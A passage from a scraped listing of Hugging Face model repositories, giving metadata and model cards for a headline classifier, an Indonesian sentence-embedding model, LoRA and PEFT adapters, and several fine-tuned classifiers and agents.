export RUN_ID=YOUR_MLFLOW_EXPERIMENT_RUN_ID
python3 evaluate.py --run_id $RUN_ID --dataset_loc "path/to/dataset" --results_fp results.json
```
```json
{
"timestamp": "January 22, 2024 09:57:12 AM",
"precision": 0.9163323229539818,
"recall": 0.9124083769633508,
"f1": 0.9137224104301406,
"num_samples": 1000.0
}
```
- run_id: ID of the specific MLflow run to load from.
### Inference
```
python3 predict.py --run_id $RUN_ID --headline "Airport Guide: Chicago O'Hare" --keyword "destination"
```
```json
[
{
"prediction": "TRAVEL",
"probabilities": {
"BUSINESS": 0.0024151806719601154,
"ENTERTAINMENT": 0.002721842611208558,
"FOOD & DRINK": 0.001193400239571929,
"PARENTING": 0.0015436559915542603,
"POLITICS": 0.0012392215430736542,
"SPORTS": 0.0020724297501146793,
"STYLE & BEAUTY": 0.0018642042996361852,
"TRAVEL": 0.9841892123222351,
"WELLNESS": 0.0013303911546245217,
"WORLD NEWS": 0.0014305398799479008
}
}
]
```
### Application
```bash
python3 app.py --run_id $RUN_ID --num_cpus 2
```
Now, we can send requests to our application:
```python
import json
import requests
headline = "Reboot Your Skin For Spring With These Facial Treatments"
keywords = "skin-facial-treatments"
json_data = json.dumps({"headline": headline, "keywords": keywords})
out = requests.post("http://127.0.0.1:8010/predict", data=json_data).json()
print(out["results"][0])
```
```json
{
"prediction": "STYLE & BEAUTY",
"probabilities": {
"BUSINESS": 0.002265132963657379,
"ENTERTAINMENT": 0.008689943701028824,
"FOOD & DRINK": 0.0011296054581180215,
"PARENTING": 0.002621663035824895,
"POLITICS": 0.002141285454854369,
"SPORTS": 0.0017548275645822287,
"STYLE & BEAUTY": 0.9760453104972839,
"TRAVEL": 0.0024237297475337982,
"WELLNESS": 0.001382972695864737,
"WORLD NEWS": 0.0015455639222636819
}
}
```
### Testing the Code
How to test the written code for asserted inputs and outputs:
```bash
python3 -m pytest tests/code --verbose --disable-warnings
```
How to test the Model behaviour:
```bash
python3 -m pytest --run-id $RUN_ID tests/model --verbose --disable-warnings
```
### Workload
To execute all stages of this project with a single command, a `workload.sh` script has been provided; change the resource parameters (cpu_nums, gpu_nums, etc.) to suit your needs.
```bash
bash workload.sh
```
### Extras
Makefile to clean the directories and format scripts:
```bash
make style && make clean
```
Serve the documentation for functions and classes:
```bash
python3 -m mkdocs serve
``` |
LazarusNLP/sct-indobert-base | LazarusNLP | 2024-01-22T03:54:37Z | 9 | 0 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"id",
"dataset:LazarusNLP/wikipedia_id_backtranslated",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] | sentence-similarity | 2024-01-18T15:06:26Z | ---
library_name: sentence-transformers
pipeline_tag: sentence-similarity
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
datasets:
- LazarusNLP/wikipedia_id_backtranslated
language:
- id
---
# LazarusNLP/sct-indobert-base
This is a [sentence-transformers](https://www.SBERT.net) model: It maps sentences & paragraphs to a 768 dimensional dense vector space and can be used for tasks like clustering or semantic search.
<!--- Describe your model here -->
## Usage (Sentence-Transformers)
Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed:
```
pip install -U sentence-transformers
```
Then you can use the model like this:
```python
from sentence_transformers import SentenceTransformer
sentences = ["This is an example sentence", "Each sentence is converted"]
model = SentenceTransformer('LazarusNLP/sct-indobert-base')
embeddings = model.encode(sentences)
print(embeddings)
```
## Usage (HuggingFace Transformers)
Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: First, you pass your input through the transformer model, then you have to apply the right pooling-operation on-top of the contextualized word embeddings.
```python
from transformers import AutoTokenizer, AutoModel
import torch
#Mean Pooling - Take attention mask into account for correct averaging
def mean_pooling(model_output, attention_mask):
token_embeddings = model_output[0] #First element of model_output contains all token embeddings
input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()
return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9)
# Sentences we want sentence embeddings for
sentences = ['This is an example sentence', 'Each sentence is converted']
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained('LazarusNLP/sct-indobert-base')
model = AutoModel.from_pretrained('LazarusNLP/sct-indobert-base')
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
model_output = model(**encoded_input)
# Perform pooling. In this case, mean pooling.
sentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask'])
print("Sentence embeddings:")
print(sentence_embeddings)
```
## Evaluation Results
<!--- Describe how your model was evaluated -->
For an automated evaluation of this model, see the *Sentence Embeddings Benchmark*: [https://seb.sbert.net](https://seb.sbert.net?model_name=LazarusNLP/sct-indobert-base)
## Training
The model was trained with the parameters:
**DataLoader**:
`torch.utils.data.dataloader.DataLoader` of length 7813 with parameters:
```
{'batch_size': 128, 'sampler': 'torch.utils.data.sampler.RandomSampler', 'batch_sampler': 'torch.utils.data.sampler.BatchSampler'}
```
**Loss**:
`sentence_transformers.losses.SCTLoss_distillation.SCTLoss_distillation`
Parameters of the fit()-Method:
```
{
"epochs": 20,
"evaluation_steps": 0,
"evaluator": "sentence_transformers.evaluation.EmbeddingSimilarityEvaluator.EmbeddingSimilarityEvaluator",
"max_grad_norm": 1,
"optimizer_class": "<class 'torch.optim.adamw.AdamW'>",
"optimizer_params": {
"eps": 1e-06,
"lr": 0.0001
},
"scheduler": "WarmupLinear",
"steps_per_epoch": null,
"warmup_steps": 15626,
"weight_decay": 0.01
}
```
## Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 128, 'do_lower_case': False}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False})
)
```
## Citing & Authors
<!--- Describe where people can find more information --> |
migueldeguzmandev/phi-1.5_paperclipmaximizer_v3 | migueldeguzmandev | 2024-01-22T03:51:28Z | 88 | 0 | transformers | [
"transformers",
"pytorch",
"phi",
"text-generation",
"custom_code",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2023-12-11T07:05:47Z | [Research Log: RLFCV2, Petertodd, the paperclip maximizer](https://www.lesswrong.com/posts/doLkRMasXMKyafJrz/research-log-rlfcv2-training-phi-1-5-gpt2xl-and-falcon-rw-1b)
|
migueldeguzmandev/phi-1.5_paperclipmaximizer_v2 | migueldeguzmandev | 2024-01-22T03:51:13Z | 88 | 0 | transformers | [
"transformers",
"pytorch",
"phi",
"text-generation",
"custom_code",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2023-12-11T03:42:56Z | [Research Log: RLFCV2, Petertodd, the paperclip maximizer](https://www.lesswrong.com/posts/doLkRMasXMKyafJrz/research-log-rlfcv2-training-phi-1-5-gpt2xl-and-falcon-rw-1b)
|
migueldeguzmandev/paperclip-falcon-rw-1b-3 | migueldeguzmandev | 2024-01-22T03:50:41Z | 11 | 0 | transformers | [
"transformers",
"pytorch",
"falcon",
"text-generation",
"custom_code",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2023-12-19T07:32:00Z | [Research Log: RLFCV2, Petertodd, the paperclip maximizer](https://www.lesswrong.com/posts/doLkRMasXMKyafJrz/research-log-rlfcv2-training-phi-1-5-gpt2xl-and-falcon-rw-1b)
|
migueldeguzmandev/paperclip_falcon-rw-1b | migueldeguzmandev | 2024-01-22T03:50:16Z | 10 | 0 | transformers | [
"transformers",
"pytorch",
"falcon",
"text-generation",
"custom_code",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2023-12-19T02:31:08Z | [Research Log: RLFCV2, Petertodd, the paperclip maximizer](https://www.lesswrong.com/posts/doLkRMasXMKyafJrz/research-log-rlfcv2-training-phi-1-5-gpt2xl-and-falcon-rw-1b)
|
Andyrasika/lora_collection | Andyrasika | 2024-01-22T03:47:14Z | 0 | 3 | null | [
"license:creativeml-openrail-m",
"region:us"
] | null | 2023-09-24T17:20:42Z | ---
license: creativeml-openrail-m
---
LORA:
- https://civitai.com/models/124347/xlmoreart-full-xlreal-enhancer
- https://civitai.com/models/120663?modelVersionId=131991
- https://civitai.com/models/6526/studio-ghibli-style-lora
- https://civitai.com/models/117041/wowifierxl
- https://civitai.com/models/122359/detail-tweaker-xl
- xl_real/Enhancer - https://civitai.com/models/124347/xlmoreart-full-xlreal-enhancer
Model
- https://civitai.com/models/25694/epicrealism
- https://civitai.com/models/119229/zavychromaxl
- https://civitai.com/models/118913/sdxl-10-arienmixxl-asian-portrait
- https://civitai.com/models/76489/sdxl-yamers-anime-ultra-infinity
- https://civitai.com/models/84040/sdxl-unstable-diffusers-yamermix
LCM
- https://huggingface.co/bluepen5805/blue_pencil-XL/blob/main/blue_pencil-XL-v1.0.0-lcm.safetensors
Music:
- https://civitai.com/models/1619?modelVersionId=1762
 |
StarkWizard/llama-2-7b-cairo-trained-PEFT | StarkWizard | 2024-01-22T03:40:40Z | 2 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:codellama/CodeLlama-7b-Instruct-hf",
"base_model:adapter:codellama/CodeLlama-7b-Instruct-hf",
"region:us"
] | null | 2024-01-21T13:44:23Z | ---
library_name: peft
base_model: codellama/CodeLlama-7b-Instruct-hf
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.7.1 |
sowbaranika13/vit-base-patch16-224-finetuned-flower | sowbaranika13 | 2024-01-22T03:11:46Z | 147 | 0 | transformers | [
"transformers",
"pytorch",
"vit",
"image-classification",
"generated_from_trainer",
"dataset:imagefolder",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | image-classification | 2024-01-20T21:40:28Z | ---
license: apache-2.0
tags:
- generated_from_trainer
datasets:
- imagefolder
model-index:
- name: vit-base-patch16-224-finetuned-flower
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# vit-base-patch16-224-finetuned-flower
This model is a fine-tuned version of [google/vit-base-patch16-224](https://huggingface.co/google/vit-base-patch16-224) on the imagefolder dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
### Framework versions
- Transformers 4.24.0
- Pytorch 2.1.0+cu121
- Datasets 2.7.1
- Tokenizers 0.13.3
|
duy221/my_awesome_model | duy221 | 2024-01-22T03:11:15Z | 5 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"distilbert",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilbert-base-uncased",
"base_model:finetune:distilbert/distilbert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-18T10:02:13Z | ---
license: apache-2.0
base_model: distilbert-base-uncased
tags:
- generated_from_trainer
model-index:
- name: my_awesome_model
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# my_awesome_model
This model is a fine-tuned version of [distilbert-base-uncased](https://huggingface.co/distilbert-base-uncased) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
sebasgaviria79/ielts-grading-regression | sebasgaviria79 | 2024-01-22T03:09:41Z | 31 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"roberta",
"text-classification",
"generated_from_trainer",
"base_model:distilbert/distilroberta-base",
"base_model:finetune:distilbert/distilroberta-base",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-22T02:57:05Z | ---
license: apache-2.0
base_model: distilroberta-base
tags:
- generated_from_trainer
model-index:
- name: ielts-grading-regression
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# ielts-grading-regression
This model is a fine-tuned version of [distilroberta-base](https://huggingface.co/distilroberta-base) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 1
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.0.0
- Datasets 2.16.1
- Tokenizers 0.15.0
|
thangvip/vi-t5-reward-model-2-epochs | thangvip | 2024-01-22T03:08:15Z | 5 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text-classification",
"generated_from_trainer",
"base_model:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"base_model:finetune:thangvip/vi-t5-base-finetune-rewriter-5-epochs",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-22T03:07:42Z | ---
license: mit
base_model: thangvip/vi-t5-base-finetune-rewriter-5-epochs
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: vi-t5-reward-model-2-epochs
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# vi-t5-reward-model-2-epochs
This model is a fine-tuned version of [thangvip/vi-t5-base-finetune-rewriter-5-epochs](https://huggingface.co/thangvip/vi-t5-base-finetune-rewriter-5-epochs) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.5029
- Accuracy: 0.7577
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1.41e-05
- train_batch_size: 32
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
intervitens/internlm2-limarp-lora | intervitens | 2024-01-22T03:07:12Z | 5 | 1 | peft | [
"peft",
"llama",
"generated_from_trainer",
"base_model:intervitens/internlm2-base-20b-llama",
"base_model:adapter:intervitens/internlm2-base-20b-llama",
"8-bit",
"bitsandbytes",
"region:us"
] | null | 2024-01-22T03:05:46Z | ---
library_name: peft
tags:
- generated_from_trainer
base_model: intervitens/internlm2-base-20b-llama
model-index:
- name: internlm-limarp-lora
results: []
---
Don't use this yet, there's a problem with the llamafied internlm2 tokenizer.
Prompt format: ChatML.
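For reference, a ChatML-formatted prompt looks like the following (a generic sketch, not taken from this card):
```
<|im_start|>system
You are a helpful assistant.<|im_end|>
<|im_start|>user
Hello!<|im_end|>
<|im_start|>assistant
```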
[<img src="https://raw.githubusercontent.com/OpenAccess-AI-Collective/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/OpenAccess-AI-Collective/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.3.0`
```yaml
base_model: /data/internlm2-base-20b-llama
model_type: LlamaForCausalLM
tokenizer_type: LlamaTokenizer
is_llama_derived_model: true
load_in_8bit: true
load_in_4bit: false
strict: false
datasets:
- path: /data/train-all-8k.jsonl
type: completion
dataset_prepared_path:
val_set_size: 0.05
output_dir: /data/internlm-limarp-lora-out
sequence_len: 8192
sample_packing: true
pad_to_sequence_len: true
adapter: lora
lora_model_dir:
lora_r: 128
lora_alpha: 64
lora_dropout: 0.05
lora_target_linear: true
lora_fan_in_fan_out:
gradient_accumulation_steps: 4
micro_batch_size: 2
num_epochs: 4
optimizer: adamw_bnb_8bit
lr_scheduler: cosine
learning_rate: 0.00002
train_on_inputs: false
group_by_length: false
bf16: true
fp16: false
tf32: false
gradient_checkpointing: true
gradient_checkpointing_kwargs:
early_stopping_patience:
resume_from_checkpoint:
local_rank:
logging_steps: 1
xformers_attention:
flash_attention: true
s2_attention:
warmup_steps: 10
evals_per_epoch: 4
eval_table_size:
eval_table_max_new_tokens: 128
saves_per_epoch: 1
debug:
deepspeed:
weight_decay: 0.0
fsdp:
fsdp_config:
special_tokens:
bos_token: "<s>"
eos_token: "</s>"
unk_token: "<unk>"
```
</details><br>
# internlm-limarp-lora
This model was trained from scratch on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 2.1216
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
The following `bitsandbytes` quantization config was used during training:
- quant_method: bitsandbytes
- load_in_8bit: True
- load_in_4bit: False
- llm_int8_threshold: 6.0
- llm_int8_skip_modules: None
- llm_int8_enable_fp32_cpu_offload: False
- llm_int8_has_fp16_weight: False
- bnb_4bit_quant_type: fp4
- bnb_4bit_use_double_quant: False
- bnb_4bit_compute_dtype: float32
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 8
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 10
- num_epochs: 4
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| 2.3563 | 0.01 | 1 | 2.3995 |
| 2.1815 | 0.25 | 37 | 2.2693 |
| 2.1364 | 0.51 | 74 | 2.1684 |
| 2.1355 | 0.76 | 111 | 2.1526 |
| 2.1624 | 1.03 | 148 | 2.1435 |
| 2.1326 | 1.28 | 185 | 2.1367 |
| 1.9987 | 1.54 | 222 | 2.1330 |
| 2.0494 | 1.79 | 259 | 2.1291 |
| 2.0505 | 2.04 | 296 | 2.1266 |
| 2.075 | 2.3 | 333 | 2.1243 |
| 2.0183 | 2.55 | 370 | 2.1229 |
| 2.1047 | 2.81 | 407 | 2.1227 |
| 2.1309 | 3.06 | 444 | 2.1218 |
| 2.1249 | 3.31 | 481 | 2.1214 |
| 2.1423 | 3.57 | 518 | 2.1214 |
| 2.0913 | 3.82 | 555 | 2.1216 |
### Framework versions
- PEFT 0.7.0
- Transformers 4.37.0.dev0
- Pytorch 2.0.1+cu118
- Datasets 2.16.1
- Tokenizers 0.15.0
|
carlois0708/chatfinanciero | carlois0708 | 2024-01-22T03:03:04Z | 0 | 0 | null | [
"finance",
"license:apache-2.0",
"region:us"
] | null | 2024-01-22T03:01:50Z | ---
license: apache-2.0
tags:
- finance
--- |
scansiz/breast_bus-lora | scansiz | 2024-01-22T03:00:44Z | 0 | 0 | diffusers | [
"diffusers",
"safetensors",
"stable-diffusion",
"stable-diffusion-diffusers",
"text-to-image",
"lora",
"base_model:runwayml/stable-diffusion-v1-5",
"base_model:adapter:runwayml/stable-diffusion-v1-5",
"license:creativeml-openrail-m",
"region:us"
] | text-to-image | 2024-01-20T18:55:13Z |
---
license: creativeml-openrail-m
base_model: runwayml/stable-diffusion-v1-5
tags:
- stable-diffusion
- stable-diffusion-diffusers
- text-to-image
- diffusers
- lora
inference: true
---
# LoRA text2image fine-tuning - scansiz/breast_bus-lora
These are LoRA adaptation weights for runwayml/stable-diffusion-v1-5. The weights were fine-tuned on the scansiz/breast_bus dataset. You can find some example images below.




|
io-roboto/ppo-SnowballTarget | io-roboto | 2024-01-22T02:55:32Z | 12 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"SnowballTarget",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SnowballTarget",
"region:us"
] | reinforcement-learning | 2024-01-22T02:55:30Z | ---
library_name: ml-agents
tags:
- SnowballTarget
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SnowballTarget
---
# **ppo** Agent playing **SnowballTarget**
This is a trained model of a **ppo** agent playing **SnowballTarget**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how ML-Agents works:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Find your model_id: io-roboto/ppo-SnowballTarget
3. Select your *.nn / *.onnx file
4. Click on Watch the agent play 👀
|
Mehrabbz/sbehavior | Mehrabbz | 2024-01-22T02:44:45Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2024-01-21T22:44:15Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Benson/llama-2-7b-miniguanaco-test | Benson | 2024-01-22T02:34:05Z | 0 | 0 | peft | [
"peft",
"safetensors",
"llama",
"arxiv:1910.09700",
"base_model:mlabonne/llama-2-7b-miniguanaco",
"base_model:adapter:mlabonne/llama-2-7b-miniguanaco",
"region:us"
] | null | 2024-01-22T02:01:43Z | ---
library_name: peft
base_model: mlabonne/llama-2-7b-miniguanaco
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
